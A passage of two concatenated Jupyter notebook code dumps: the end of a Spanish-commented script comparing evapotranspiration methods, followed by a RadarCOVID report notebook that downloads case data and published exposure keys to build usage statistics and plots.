Indice_termico_anual**2+(1792*10**(-5)*Indice_termico_anual)+0.49239)
#los valores constantes los convertimos a lista
I_mensual_lista=[Indice_termico_anual for x in range(1, 13)]
a_lista=[a for x in range(1, 13)]
# Calculamos la evapotranspiracion teorica
eto_Thornthwaite_teorica = 16*(10*Tm/Indice_termico_anual)**a
# insolacion maxima (N)
N = col_insolacion
f = N/12
d_30 = dias/30
# finalmente el valor teorico
eto_mensual_Thornthwaite = d_30*f*eto_Thornthwaite_teorica
# creamos la tabla
# nombre columnas
nombre_tabla_Thornthwaite = ['MES', 'Temperarura media (C)', 'Indice Termico Mensual', 'Indice Termico Anual', 'a', 'Evapotranspiracion Teorica Diaria',
'Insolacion maxima diaria', 'f', 'Dias por mes', 'Evapotranspiracion Mensual']
valores = list(zip(meses, Tm, Indice_termico_mensual, I_mensual_lista, a_lista, eto_Thornthwaite_teorica,
N, f, dias, eto_mensual_Thornthwaite))
df_evap_Thornthwaite = pd.DataFrame(valores, columns=nombre_tabla_Thornthwaite)
# visualizamos la tabla
df_evap_Thornthwaite
# Comparamos los resultados en una tabla resumen
# las listas de los valores por cada metodo
"""
eto_mensual_fao
eto_mensual_makkind
eto_mensual_jansen
eto_mensual_priestley
eto_mensual_turc
eto_mensual_hargreaves
eto_mensual_Thornthwaite """
# creamos la tabla resumen
# nombre columnas
nombre_tabla_resumen_metodos = ['MES', 'Metodo de la FAO', 'Metodo Makkind', 'Metodo Jansen', 'Metodo Priestley', 'Metodo Turc', 'Metodo Hardgreaves',
'Metodo Thornthwaite', ]
valores = list(zip(meses, eto_mensual_fao, eto_mensual_makkind, eto_mensual_jansen, eto_mensual_priestley, eto_mensual_turc,
eto_mensual_hargreaves, eto_mensual_Thornthwaite))
df_resumen_metodos = pd.DataFrame(valores, columns=nombre_tabla_resumen_metodos)
# visualizamos la tabla
df_resumen_metodos
#graficamos los valores por cada metodo para ver el comportamiento de la evapotranspiracion en el transcurso del año
dias_acumulados = [31,59,90,120,151,181,212,243,273,304,334,365]
#Grafica
fig = plt.figure(figsize=(15,7 ))
plt.plot( meses,eto_mensual_fao, label="FAO", ls='-',)
plt.plot( meses,eto_mensual_makkind, label="MAKKIND", ls='-')
plt.plot( meses,eto_mensual_jansen, label="JANSEN", ls='-')
plt.plot( meses,eto_mensual_priestley, label="PRIESTLEY", ls='-')
plt.plot( meses,eto_mensual_turc, label="TURC", ls='-')
plt.plot( meses,eto_mensual_hargreaves, label="HARGREAVES", ls='-')
plt.plot( meses,eto_mensual_Thornthwaite, label="THORNTHAWAITE", ls='-')
#plt.axis(v)
plt.title(f'EVAPOTRANSPIRACION MENSUAL POR CADA METODO ', color='#00008B',fontsize=18)
plt.xlabel('Meses del año',fontsize=14)
plt.ylabel(f'Evapotranspiracion mensual',fontsize=14)
plt.grid(b=True, which='major', color='#666668', linestyle='--')
plt.legend(loc=4)
plt.show()
#Creamos la Matriz de correlacion con la libreria seaborn
#esto nos permite saber que tan dispersos se encuentran la correlacion de los resultados entre los diferentes metodos
import seaborn as sns
corr_df = df_resumen_metodos.corr(method='pearson')
plt.figure(figsize=(8, 6))
sns.heatmap(corr_df, annot=True)
plt.show()
```
| github_jupyter |
# RadarCOVID-Report
## Data Extraction
```
import datetime
import json
import logging
import os
import shutil
import tempfile
import textwrap
import uuid
import matplotlib.pyplot as plt
import matplotlib.ticker
import numpy as np
import pandas as pd
import pycountry
import retry
import seaborn as sns
%matplotlib inline
current_working_directory = os.environ.get("PWD")
if current_working_directory:
os.chdir(current_working_directory)
sns.set()
matplotlib.rcParams["figure.figsize"] = (15, 6)
extraction_datetime = datetime.datetime.utcnow()
extraction_date = extraction_datetime.strftime("%Y-%m-%d")
extraction_previous_datetime = extraction_datetime - datetime.timedelta(days=1)
extraction_previous_date = extraction_previous_datetime.strftime("%Y-%m-%d")
extraction_date_with_hour = datetime.datetime.utcnow().strftime("%Y-%m-%d@%H")
current_hour = datetime.datetime.utcnow().hour
are_today_results_partial = current_hour != 23
```
### Constants
```
from Modules.ExposureNotification import exposure_notification_io
spain_region_country_code = "ES"
germany_region_country_code = "DE"
default_backend_identifier = spain_region_country_code
backend_generation_days = 7 * 2
daily_summary_days = 7 * 4 * 3
daily_plot_days = 7 * 4
tek_dumps_load_limit = daily_summary_days + 1
```
### Parameters
```
environment_backend_identifier = os.environ.get("RADARCOVID_REPORT__BACKEND_IDENTIFIER")
if environment_backend_identifier:
report_backend_identifier = environment_backend_identifier
else:
report_backend_identifier = default_backend_identifier
report_backend_identifier
environment_enable_multi_backend_download = \
os.environ.get("RADARCOVID_REPORT__ENABLE_MULTI_BACKEND_DOWNLOAD")
if environment_enable_multi_backend_download:
report_backend_identifiers = None
else:
report_backend_identifiers = [report_backend_identifier]
report_backend_identifiers
environment_invalid_shared_diagnoses_dates = \
os.environ.get("RADARCOVID_REPORT__INVALID_SHARED_DIAGNOSES_DATES")
if environment_invalid_shared_diagnoses_dates:
invalid_shared_diagnoses_dates = environment_invalid_shared_diagnoses_dates.split(",")
else:
invalid_shared_diagnoses_dates = []
invalid_shared_diagnoses_dates
```
### COVID-19 Cases
```
report_backend_client = \
exposure_notification_io.get_backend_client_with_identifier(
backend_identifier=report_backend_identifier)
@retry.retry(tries=10, delay=10, backoff=1.1, jitter=(0, 10))
def download_cases_dataframe():
return pd.read_csv("https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/owid-covid-data.csv")
confirmed_df_ = download_cases_dataframe()
confirmed_df_.iloc[0]
confirmed_df = confirmed_df_.copy()
confirmed_df = confirmed_df[["date", "new_cases", "iso_code"]]
confirmed_df.rename(
columns={
"date": "sample_date",
"iso_code": "country_code",
},
inplace=True)
def convert_iso_alpha_3_to_alpha_2(x):
try:
return pycountry.countries.get(alpha_3=x).alpha_2
except Exception as e:
logging.info(f"Error converting country ISO Alpha 3 code '{x}': {repr(e)}")
return None
confirmed_df["country_code"] = confirmed_df.country_code.apply(convert_iso_alpha_3_to_alpha_2)
confirmed_df.dropna(inplace=True)
confirmed_df["sample_date"] = pd.to_datetime(confirmed_df.sample_date, dayfirst=True)
confirmed_df["sample_date"] = confirmed_df.sample_date.dt.strftime("%Y-%m-%d")
confirmed_df.sort_values("sample_date", inplace=True)
confirmed_df.tail()
confirmed_days = pd.date_range(
start=confirmed_df.iloc[0].sample_date,
end=extraction_datetime)
confirmed_days_df = pd.DataFrame(data=confirmed_days, columns=["sample_date"])
confirmed_days_df["sample_date_string"] = \
confirmed_days_df.sample_date.dt.strftime("%Y-%m-%d")
confirmed_days_df.tail()
def sort_source_regions_for_display(source_regions: list) -> list:
if report_backend_identifier in source_regions:
source_regions = [report_backend_identifier] + \
list(sorted(set(source_regions).difference([report_backend_identifier])))
else:
source_regions = list(sorted(source_regions))
return source_regions
report_source_regions = report_backend_client.source_regions_for_date(
date=extraction_datetime.date())
report_source_regions = sort_source_regions_for_display(
source_regions=report_source_regions)
report_source_regions
def get_cases_dataframe(source_regions_for_date_function, columns_suffix=None):
source_regions_at_date_df = confirmed_days_df.copy()
source_regions_at_date_df["source_regions_at_date"] = \
source_regions_at_date_df.sample_date.apply(
lambda x: source_regions_for_date_function(date=x))
source_regions_at_date_df.sort_values("sample_date", inplace=True)
source_regions_at_date_df["_source_regions_group"] = source_regions_at_date_df. \
source_regions_at_date.apply(lambda x: ",".join(sort_source_regions_for_display(x)))
source_regions_at_date_df.tail()
#%%
source_regions_for_summary_df_ = \
source_regions_at_date_df[["sample_date", "_source_regions_group"]].copy()
source_regions_for_summary_df_.rename(columns={"_source_regions_group": "source_regions"}, inplace=True)
source_regions_for_summary_df_.tail()
#%%
confirmed_output_columns = ["sample_date", "new_cases", "covid_cases"]
confirmed_output_df = pd.DataFrame(columns=confirmed_output_columns)
for source_regions_group, source_regions_group_series in \
source_regions_at_date_df.groupby("_source_regions_group"):
source_regions_set = set(source_regions_group.split(","))
confirmed_source_regions_set_df = \
confirmed_df[confirmed_df.country_code.isin(source_regions_set)].copy()
confirmed_source_regions_group_df = \
confirmed_source_regions_set_df.groupby("sample_date").new_cases.sum() \
.reset_index().sort_values("sample_date")
confirmed_source_regions_group_df = \
confirmed_source_regions_group_df.merge(
confirmed_days_df[["sample_date_string"]].rename(
columns={"sample_date_string": "sample_date"}),
how="right")
confirmed_source_regions_group_df["new_cases"] = \
confirmed_source_regions_group_df["new_cases"].clip(lower=0)
confirmed_source_regions_group_df["covid_cases"] = \
confirmed_source_regions_group_df.new_cases.rolling(7, min_periods=0).mean().round()
confirmed_source_regions_group_df = \
confirmed_source_regions_group_df[confirmed_output_columns]
confirmed_source_regions_group_df = confirmed_source_regions_group_df.replace(0, np.nan)
confirmed_source_regions_group_df.fillna(method="ffill", inplace=True)
confirmed_source_regions_group_df = \
confirmed_source_regions_group_df[
confirmed_source_regions_group_df.sample_date.isin(
source_regions_group_series.sample_date_string)]
confirmed_output_df = confirmed_output_df.append(confirmed_source_regions_group_df)
result_df = confirmed_output_df.copy()
result_df.tail()
#%%
result_df.rename(columns={"sample_date": "sample_date_string"}, inplace=True)
result_df = confirmed_days_df[["sample_date_string"]].merge(result_df, how="left")
result_df.sort_values("sample_date_string", inplace=True)
result_df.fillna(method="ffill", inplace=True)
result_df.tail()
#%%
result_df[["new_cases", "covid_cases"]].plot()
if columns_suffix:
result_df.rename(
columns={
"new_cases": "new_cases_" + columns_suffix,
"covid_cases": "covid_cases_" + columns_suffix},
inplace=True)
return result_df, source_regions_for_summary_df_
confirmed_eu_df, source_regions_for_summary_df = get_cases_dataframe(
report_backend_client.source_regions_for_date)
confirmed_es_df, _ = get_cases_dataframe(
lambda date: [spain_region_country_code],
columns_suffix=spain_region_country_code.lower())
```
### Extract API TEKs
```
raw_zip_path_prefix = "Data/TEKs/Raw/"
base_backend_identifiers = [report_backend_identifier]
multi_backend_exposure_keys_df = \
exposure_notification_io.download_exposure_keys_from_backends(
backend_identifiers=report_backend_identifiers,
generation_days=backend_generation_days,
fail_on_error_backend_identifiers=base_backend_identifiers,
save_raw_zip_path_prefix=raw_zip_path_prefix)
multi_backend_exposure_keys_df["region"] = multi_backend_exposure_keys_df["backend_identifier"]
multi_backend_exposure_keys_df.rename(
columns={
"generation_datetime": "sample_datetime",
"generation_date_string": "sample_date_string",
},
inplace=True)
multi_backend_exposure_keys_df.head()
early_teks_df = multi_backend_exposure_keys_df[
multi_backend_exposure_keys_df.rolling_period < 144].copy()
early_teks_df["rolling_period_in_hours"] = early_teks_df.rolling_period / 6
early_teks_df[early_teks_df.sample_date_string != extraction_date] \
.rolling_period_in_hours.hist(bins=list(range(24)))
early_teks_df[early_teks_df.sample_date_string == extraction_date] \
.rolling_period_in_hours.hist(bins=list(range(24)))
multi_backend_exposure_keys_df = multi_backend_exposure_keys_df[[
"sample_date_string", "region", "key_data"]]
multi_backend_exposure_keys_df.head()
active_regions = \
multi_backend_exposure_keys_df.groupby("region").key_data.nunique().sort_values().index.unique().tolist()
active_regions
multi_backend_summary_df = multi_backend_exposure_keys_df.groupby(
["sample_date_string", "region"]).key_data.nunique().reset_index() \
.pivot(index="sample_date_string", columns="region") \
.sort_index(ascending=False)
multi_backend_summary_df.rename(
columns={"key_data": "shared_teks_by_generation_date"},
inplace=True)
multi_backend_summary_df.rename_axis("sample_date", inplace=True)
multi_backend_summary_df = multi_backend_summary_df.fillna(0).astype(int)
multi_backend_summary_df = multi_backend_summary_df.head(backend_generation_days)
multi_backend_summary_df.head()
def compute_keys_cross_sharing(x):
teks_x = x.key_data_x.item()
common_teks = set(teks_x).intersection(x.key_data_y.item())
common_teks_fraction = len(common_teks) / len(teks_x)
return pd.Series(dict(
common_teks=common_teks,
common_teks_fraction=common_teks_fraction,
))
multi_backend_exposure_keys_by_region_df = \
multi_backend_exposure_keys_df.groupby("region").key_data.unique().reset_index()
multi_backend_exposure_keys_by_region_df["_merge"] = True
multi_backend_exposure_keys_by_region_combination_df = \
multi_backend_exposure_keys_by_region_df.merge(
multi_backend_exposure_keys_by_region_df, on="_merge")
multi_backend_exposure_keys_by_region_combination_df.drop(
columns=["_merge"], inplace=True)
if multi_backend_exposure_keys_by_region_combination_df.region_x.nunique() > 1:
multi_backend_exposure_keys_by_region_combination_df = \
multi_backend_exposure_keys_by_region_combination_df[
multi_backend_exposure_keys_by_region_combination_df.region_x !=
multi_backend_exposure_keys_by_region_combination_df.region_y]
multi_backend_exposure_keys_cross_sharing_df = \
multi_backend_exposure_keys_by_region_combination_df \
.groupby(["region_x", "region_y"]) \
.apply(compute_keys_cross_sharing) \
.reset_index()
multi_backend_cross_sharing_summary_df = \
multi_backend_exposure_keys_cross_sharing_df.pivot_table(
values=["common_teks_fraction"],
columns="region_x",
index="region_y",
aggfunc=lambda x: x.item())
multi_backend_cross_sharing_summary_df
multi_backend_without_active_region_exposure_keys_df = \
multi_backend_exposure_keys_df[multi_backend_exposure_keys_df.region != report_backend_identifier]
multi_backend_without_active_region = \
multi_backend_without_active_region_exposure_keys_df.groupby("region").key_data.nunique().sort_values().index.unique().tolist()
multi_backend_without_active_region
exposure_keys_summary_df = multi_backend_exposure_keys_df[
multi_backend_exposure_keys_df.region == report_backend_identifier]
exposure_keys_summary_df.drop(columns=["region"], inplace=True)
exposure_keys_summary_df = \
exposure_keys_summary_df.groupby(["sample_date_string"]).key_data.nunique().to_frame()
exposure_keys_summary_df = \
exposure_keys_summary_df.reset_index().set_index("sample_date_string")
exposure_keys_summary_df.sort_index(ascending=False, inplace=True)
exposure_keys_summary_df.rename(columns={"key_data": "shared_teks_by_generation_date"}, inplace=True)
exposure_keys_summary_df.head()
```
### Dump API TEKs
```
tek_list_df = multi_backend_exposure_keys_df[
["sample_date_string", "region", "key_data"]].copy()
tek_list_df["key_data"] = tek_list_df["key_data"].apply(str)
tek_list_df.rename(columns={
"sample_date_string": "sample_date",
"key_data": "tek_list"}, inplace=True)
tek_list_df = tek_list_df.groupby(
["sample_date", "region"]).tek_list.unique().reset_index()
tek_list_df["extraction_date"] = extraction_date
tek_list_df["extraction_date_with_hour"] = extraction_date_with_hour
tek_list_path_prefix = "Data/TEKs/"
tek_list_current_path = tek_list_path_prefix + f"/Current/RadarCOVID-TEKs.json"
tek_list_daily_path = tek_list_path_prefix + f"Daily/RadarCOVID-TEKs-{extraction_date}.json"
tek_list_hourly_path = tek_list_path_prefix + f"Hourly/RadarCOVID-TEKs-{extraction_date_with_hour}.json"
for path in [tek_list_current_path, tek_list_daily_path, tek_list_hourly_path]:
os.makedirs(os.path.dirname(path), exist_ok=True)
tek_list_base_df = tek_list_df[tek_list_df.region == report_backend_identifier]
tek_list_base_df.drop(columns=["extraction_date", "extraction_date_with_hour"]).to_json(
tek_list_current_path,
lines=True, orient="records")
tek_list_base_df.drop(columns=["extraction_date_with_hour"]).to_json(
tek_list_daily_path,
lines=True, orient="records")
tek_list_base_df.to_json(
tek_list_hourly_path,
lines=True, orient="records")
tek_list_base_df.head()
```
### Load TEK Dumps
```
import glob
def load_extracted_teks(mode, region=None, limit=None) -> pd.DataFrame:
extracted_teks_df = pd.DataFrame(columns=["region"])
file_paths = list(reversed(sorted(glob.glob(tek_list_path_prefix + mode + "/RadarCOVID-TEKs-*.json"))))
if limit:
file_paths = file_paths[:limit]
for file_path in file_paths:
logging.info(f"Loading TEKs from '{file_path}'...")
iteration_extracted_teks_df = pd.read_json(file_path, lines=True)
extracted_teks_df = extracted_teks_df.append(
iteration_extracted_teks_df, sort=False)
extracted_teks_df["region"] = \
extracted_teks_df.region.fillna(spain_region_country_code).copy()
if region:
extracted_teks_df = \
extracted_teks_df[extracted_teks_df.region == region]
return extracted_teks_df
daily_extracted_teks_df = load_extracted_teks(
mode="Daily",
region=report_backend_identifier,
limit=tek_dumps_load_limit)
daily_extracted_teks_df.head()
exposure_keys_summary_df_ = daily_extracted_teks_df \
.sort_values("extraction_date", ascending=False) \
.groupby("sample_date").tek_list.first() \
.to_frame()
exposure_keys_summary_df_.index.name = "sample_date_string"
exposure_keys_summary_df_["tek_list"] = \
exposure_keys_summary_df_.tek_list.apply(len)
exposure_keys_summary_df_ = exposure_keys_summary_df_ \
.rename(columns={"tek_list": "shared_teks_by_generation_date"}) \
.sort_index(ascending=False)
exposure_keys_summary_df = exposure_keys_summary_df_
exposure_keys_summary_df.head()
```
### Daily New TEKs
```
tek_list_df = daily_extracted_teks_df.groupby("extraction_date").tek_list.apply(
lambda x: set(sum(x, []))).reset_index()
tek_list_df = tek_list_df.set_index("extraction_date").sort_index(ascending=True)
tek_list_df.head()
def compute_teks_by_generation_and_upload_date(date):
day_new_teks_set_df = tek_list_df.copy().diff()
try:
day_new_teks_set = day_new_teks_set_df[
day_new_teks_set_df.index == date].tek_list.item()
except ValueError:
day_new_teks_set = None
if pd.isna(day_new_teks_set):
day_new_teks_set = set()
day_new_teks_df = daily_extracted_teks_df[
daily_extracted_teks_df.extraction_date == date].copy()
day_new_teks_df["shared_teks"] = \
day_new_teks_df.tek_list.apply(lambda x: set(x).intersection(day_new_teks_set))
day_new_teks_df["shared_teks"] = \
day_new_teks_df.shared_teks.apply(len)
day_new_teks_df["upload_date"] = date
day_new_teks_df.rename(columns={"sample_date": "generation_date"}, inplace=True)
day_new_teks_df = day_new_teks_df[
["upload_date", "generation_date", "shared_teks"]]
day_new_teks_df["generation_to_upload_days"] = \
(pd.to_datetime(day_new_teks_df.upload_date) -
pd.to_datetime(day_new_teks_df.generation_date)).dt.days
day_new_teks_df = day_new_teks_df[day_new_teks_df.shared_teks > 0]
return day_new_teks_df
shared_teks_generation_to_upload_df = pd.DataFrame()
for upload_date in daily_extracted_teks_df.extraction_date.unique():
shared_teks_generation_to_upload_df = \
shared_teks_generation_to_upload_df.append(
compute_teks_by_generation_and_upload_date(date=upload_date))
shared_teks_generation_to_upload_df \
.sort_values(["upload_date", "generation_date"], ascending=False, inplace=True)
shared_teks_generation_to_upload_df.tail()
today_new_teks_df = \
shared_teks_generation_to_upload_df[
shared_teks_generation_to_upload_df.upload_date == extraction_date].copy()
today_new_teks_df.tail()
if not today_new_teks_df.empty:
today_new_teks_df.set_index("generation_to_upload_days") \
.sort_index().shared_teks.plot.bar()
generation_to_upload_period_pivot_df = \
shared_teks_generation_to_upload_df[
["upload_date", "generation_to_upload_days", "shared_teks"]] \
.pivot(index="upload_date", columns="generation_to_upload_days") \
.sort_index(ascending=False).fillna(0).astype(int) \
.droplevel(level=0, axis=1)
generation_to_upload_period_pivot_df.head()
new_tek_df = tek_list_df.diff().tek_list.apply(
lambda x: len(x) if not pd.isna(x) else None).to_frame().reset_index()
new_tek_df.rename(columns={
"tek_list": "shared_teks_by_upload_date",
"extraction_date": "sample_date_string",}, inplace=True)
new_tek_df.tail()
shared_teks_uploaded_on_generation_date_df = shared_teks_generation_to_upload_df[
shared_teks_generation_to_upload_df.generation_to_upload_days == 0] \
[["upload_date", "shared_teks"]].rename(
columns={
"upload_date": "sample_date_string",
"shared_teks": "shared_teks_uploaded_on_generation_date",
})
shared_teks_uploaded_on_generation_date_df.head()
estimated_shared_diagnoses_df = shared_teks_generation_to_upload_df \
.groupby(["upload_date"]).shared_teks.max().reset_index() \
.sort_values(["upload_date"], ascending=False) \
.rename(columns={
"upload_date": "sample_date_string",
"shared_teks": "shared_diagnoses",
})
invalid_shared_diagnoses_dates_mask = \
estimated_shared_diagnoses_df.sample_date_string.isin(invalid_shared_diagnoses_dates)
estimated_shared_diagnoses_df[invalid_shared_diagnoses_dates_mask] = 0
estimated_shared_diagnoses_df.head()
```
### Hourly New TEKs
```
hourly_extracted_teks_df = load_extracted_teks(
mode="Hourly", region=report_backend_identifier, limit=25)
hourly_extracted_teks_df.head()
hourly_new_tek_count_df = hourly_extracted_teks_df \
.groupby("extraction_date_with_hour").tek_list. \
apply(lambda x: set(sum(x, []))).reset_index().copy()
hourly_new_tek_count_df = hourly_new_tek_count_df.set_index("extraction_date_with_hour") \
.sort_index(ascending=True)
hourly_new_tek_count_df["new_tek_list"] = hourly_new_tek_count_df.tek_list.diff()
hourly_new_tek_count_df["new_tek_count"] = hourly_new_tek_count_df.new_tek_list.apply(
lambda x: len(x) if not pd.isna(x) else 0)
hourly_new_tek_count_df.rename(columns={
"new_tek_count": "shared_teks_by_upload_date"}, inplace=True)
hourly_new_tek_count_df = hourly_new_tek_count_df.reset_index()[[
"extraction_date_with_hour", "shared_teks_by_upload_date"]]
hourly_new_tek_count_df.head()
hourly_summary_df = hourly_new_tek_count_df.copy()
hourly_summary_df.set_index("extraction_date_with_hour", inplace=True)
hourly_summary_df = hourly_summary_df.fillna(0).astype(int).reset_index()
hourly_summary_df["datetime_utc"] = pd.to_datetime(
hourly_summary_df.extraction_date_with_hour, format="%Y-%m-%d@%H")
hourly_summary_df.set_index("datetime_utc", inplace=True)
hourly_summary_df = hourly_summary_df.tail(-1)
hourly_summary_df.head()
```
### Official Statistics
```
import requests
import pandas.io.json
official_stats_response = requests.get("https://radarcovid.covid19.gob.es/kpi/statistics/basics")
official_stats_response.raise_for_status()
official_stats_df_ = pandas.io.json.json_normalize(official_stats_response.json())
official_stats_df = official_stats_df_.copy()
official_stats_df["date"] = pd.to_datetime(official_stats_df["date"], dayfirst=True)
official_stats_df.head()
official_stats_column_map = {
"date": "sample_date",
"applicationsDownloads.totalAcummulated": "app_downloads_es_accumulated",
"communicatedContagions.totalAcummulated": "shared_diagnoses_es_accumulated",
}
accumulated_suffix = "_accumulated"
accumulated_values_columns = \
list(filter(lambda x: x.endswith(accumulated_suffix), official_stats_column_map.values()))
interpolated_values_columns = \
list(map(lambda x: x[:-len(accumulated_suffix)], accumulated_values_columns))
official_stats_df = \
official_stats_df[official_stats_column_map.keys()] \
.rename(columns=official_stats_column_map)
official_stats_df["extraction_date"] = extraction_date
official_stats_df.head()
official_stats_path = "Data/Statistics/Current/RadarCOVID-Statistics.json"
previous_official_stats_df = pd.read_json(official_stats_path, orient="records", lines=True)
previous_official_stats_df["sample_date"] = pd.to_datetime(previous_official_stats_df["sample_date"], dayfirst=True)
official_stats_df = official_stats_df.append(previous_official_stats_df)
official_stats_df.head()
official_stats_df = official_stats_df[~(official_stats_df.shared_diagnoses_es_accumulated == 0)]
official_stats_df.sort_values("extraction_date", ascending=False, inplace=True)
official_stats_df.drop_duplicates(subset=["sample_date"], keep="first", inplace=True)
official_stats_df.head()
official_stats_stored_df = official_stats_df.copy()
official_stats_stored_df["sample_date"] = official_stats_stored_df.sample_date.dt.strftime("%Y-%m-%d")
official_stats_stored_df.to_json(official_stats_path, orient="records", lines=True)
official_stats_df.drop(columns=["extraction_date"], inplace=True)
official_stats_df = confirmed_days_df.merge(official_stats_df, how="left")
official_stats_df.sort_values("sample_date", ascending=False, inplace=True)
official_stats_df.head()
official_stats_df[accumulated_values_columns] = \
official_stats_df[accumulated_values_columns] \
.astype(float).interpolate(limit_area="inside")
official_stats_df[interpolated_values_columns] = \
official_stats_df[accumulated_values_columns].diff(periods=-1)
official_stats_df.drop(columns="sample_date", inplace=True)
official_stats_df.head()
```
### Data Merge
```
result_summary_df = exposure_keys_summary_df.merge(
new_tek_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = result_summary_df.merge(
shared_teks_uploaded_on_generation_date_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = result_summary_df.merge(
estimated_shared_diagnoses_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = result_summary_df.merge(
official_stats_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = confirmed_eu_df.tail(daily_summary_days).merge(
result_summary_df, on=["sample_date_string"], how="left")
result_summary_df.head()
result_summary_df = confirmed_es_df.tail(daily_summary_days).merge(
result_summary_df, on=["sample_date_string"], how="left")
result_summary_df.head()
result_summary_df["sample_date"] = pd.to_datetime(result_summary_df.sample_date_string)
result_summary_df = result_summary_df.merge(source_regions_for_summary_df, how="left")
result_summary_df.set_index(["sample_date", "source_regions"], inplace=True)
result_summary_df.drop(columns=["sample_date_string"], inplace=True)
result_summary_df.sort_index(ascending=False, inplace=True)
result_summary_df.head()
with pd.option_context("mode.use_inf_as_na", True):
result_summary_df = result_summary_df.fillna(0).astype(int)
result_summary_df["teks_per_shared_diagnosis"] = \
(result_summary_df.shared_teks_by_upload_date / result_summary_df.shared_diagnoses).fillna(0)
result_summary_df["shared_diagnoses_per_covid_case"] = \
(result_summary_df.shared_diagnoses / result_summary_df.covid_cases).fillna(0)
result_summary_df["shared_diagnoses_per_covid_case_es"] = \
(result_summary_df.shared_diagnoses_es / result_summary_df.covid_cases_es).fillna(0)
result_summary_df.head(daily_plot_days)
def compute_aggregated_results_summary(days) -> pd.DataFrame:
aggregated_result_summary_df = result_summary_df.copy()
aggregated_result_summary_df["covid_cases_for_ratio"] = \
aggregated_result_summary_df.covid_cases.mask(
aggregated_result_summary_df.shared_diagnoses == 0, 0)
aggregated_result_summary_df["covid_cases_for_ratio_es"] = \
aggregated_result_summary_df.covid_cases_es.mask(
aggregated_result_summary_df.shared_diagnoses_es == 0, 0)
aggregated_result_summary_df = aggregated_result_summary_df \
.sort_index(ascending=True).fillna(0).rolling(days).agg({
"covid_cases": "sum",
"covid_cases_es": "sum",
"covid_cases_for_ratio": "sum",
"covid_cases_for_ratio_es": "sum",
"shared_teks_by_generation_date": "sum",
"shared_teks_by_upload_date": "sum",
"shared_diagnoses": "sum",
"shared_diagnoses_es": "sum",
}).sort_index(ascending=False)
with pd.option_context("mode.use_inf_as_na", True):
aggregated_result_summary_df = aggregated_result_summary_df.fillna(0).astype(int)
aggregated_result_summary_df["teks_per_shared_diagnosis"] = \
(aggregated_result_summary_df.shared_teks_by_upload_date /
aggregated_result_summary_df.covid_cases_for_ratio).fillna(0)
aggregated_result_summary_df["shared_diagnoses_per_covid_case"] = \
(aggregated_result_summary_df.shared_diagnoses /
aggregated_result_summary_df.covid_cases_for_ratio).fillna(0)
aggregated_result_summary_df["shared_diagnoses_per_covid_case_es"] = \
(aggregated_result_summary_df.shared_diagnoses_es /
aggregated_result_summary_df.covid_cases_for_ratio_es).fillna(0)
return aggregated_result_summary_df
aggregated_result_with_7_days_window_summary_df = compute_aggregated_results_summary(days=7)
aggregated_result_with_7_days_window_summary_df.head()
last_7_days_summary = aggregated_result_with_7_days_window_summary_df.to_dict(orient="records")[1]
last_7_days_summary
aggregated_result_with_14_days_window_summary_df = compute_aggregated_results_summary(days=13)
last_14_days_summary = aggregated_result_with_14_days_window_summary_df.to_dict(orient="records")[1]
last_14_days_summary
```
## Report Results
```
display_column_name_mapping = {
"sample_date": "Sample\u00A0Date\u00A0(UTC)",
"source_regions": "Source Countries",
"datetime_utc": "Timestamp (UTC)",
"upload_date": "Upload Date (UTC)",
"generation_to_upload_days": "Generation to Upload Period in Days",
"region": "Backend",
"region_x": "Backend\u00A0(A)",
"region_y": "Backend\u00A0(B)",
"common_teks": "Common TEKs Shared Between Backends",
"common_teks_fraction": "Fraction of TEKs in Backend (A) Available in Backend (B)",
"covid_cases": "COVID-19 Cases (Source Countries)",
"shared_teks_by_generation_date": "Shared TEKs by Generation Date (Source Countries)",
"shared_teks_by_upload_date": "Shared TEKs by Upload Date (Source Countries)",
"shared_teks_uploaded_on_generation_date": "Shared TEKs Uploaded on Generation Date (Source Countries)",
"shared_diagnoses": "Shared Diagnoses (Source Countries – Estimation)",
"teks_per_shared_diagnosis": "TEKs Uploaded per Shared Diagnosis (Source Countries)",
"shared_diagnoses_per_covid_case": "Usage Ratio (Source Countries)",
"covid_cases_es": "COVID-19 Cases (Spain)",
"app_downloads_es": "App Downloads (Spain – Official)",
"shared_diagnoses_es": "Shared Diagnoses (Spain – Official)",
"shared_diagnoses_per_covid_case_es": "Usage Ratio (Spain)",
}
summary_columns = [
"covid_cases",
"shared_teks_by_generation_date",
"shared_teks_by_upload_date",
"shared_teks_uploaded_on_generation_date",
"shared_diagnoses",
"teks_per_shared_diagnosis",
"shared_diagnoses_per_covid_case",
"covid_cases_es",
"app_downloads_es",
"shared_diagnoses_es",
"shared_diagnoses_per_covid_case_es",
]
summary_percentage_columns= [
"shared_diagnoses_per_covid_case_es",
"shared_diagnoses_per_covid_case",
]
```
### Daily Summary Table
```
result_summary_df_ = result_summary_df.copy()
result_summary_df = result_summary_df[summary_columns]
result_summary_with_display_names_df = result_summary_df \
.rename_axis(index=display_column_name_mapping) \
.rename(columns=display_column_name_mapping)
result_summary_with_display_names_df
```
### Daily Summary Plots
```
result_plot_summary_df = result_summary_df.head(daily_plot_days)[summary_columns] \
.droplevel(level=["source_regions"]) \
.rename_axis(index=display_column_name_mapping) \
.rename(columns=display_column_name_mapping)
summary_ax_list = result_plot_summary_df.sort_index(ascending=True).plot.bar(
title=f"Daily Summary",
rot=45, subplots=True, figsize=(15, 30), legend=False)
ax_ = summary_ax_list[0]
ax_.get_figure().tight_layout()
ax_.get_figure().subplots_adjust(top=0.95)
_ = ax_.set_xticklabels(sorted(result_plot_summary_df.index.strftime("%Y-%m-%d").tolist()))
for percentage_column in summary_percentage_columns:
percentage_column_index = summary_columns.index(percentage_column)
summary_ax_list[percentage_column_index].yaxis \
.set_major_formatter(matplotlib.ticker.PercentFormatter(1.0))
```
### Daily Generation to Upload Period Table
```
display_generation_to_upload_period_pivot_df = \
generation_to_upload_period_pivot_df \
.head(backend_generation_days)
display_generation_to_upload_period_pivot_df \
.head(backend_generation_days) \
.rename_axis(columns=display_column_name_mapping) \
.rename_axis(index=display_column_name_mapping)
fig, generation_to_upload_period_pivot_table_ax = plt.subplots(
figsize=(12, 1 + 0.6 * len(display_generation_to_upload_period_pivot_df)))
generation_to_upload_period_pivot_table_ax.set_title(
"Shared TEKs Generation to Upload Period Table")
sns.heatmap(
data=display_generation_to_upload_period_pivot_df
